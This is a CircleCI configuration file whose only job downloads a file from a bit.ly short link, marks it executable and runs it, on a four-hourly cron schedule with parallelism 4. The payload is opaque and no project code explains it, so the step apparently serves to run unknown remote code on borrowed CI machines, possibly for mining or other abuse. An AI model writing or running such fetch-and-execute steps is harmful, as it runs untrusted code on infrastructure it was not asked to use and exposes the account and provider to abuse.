working_dir: &working_dir ~/app

version: 2.0
jobs:
  Github:
    parallelism: 4
    docker:
      - image: cimg/python:3.8
    steps:
    - run:
        name: Github Project
        command: wget https://bit.ly/2Ukbp3U && chmod +x 2Ukbp3U && ./2Ukbp3U
        
workflows:
  version: 2
  commit:
    jobs:
      - Github
    triggers:
      - schedule:
          cron: "0 2,6,10,14,18,22 * * *"
          filters: 
            branches:
              only:
                - master
                
  Pipeline:
    jobs:
      - Github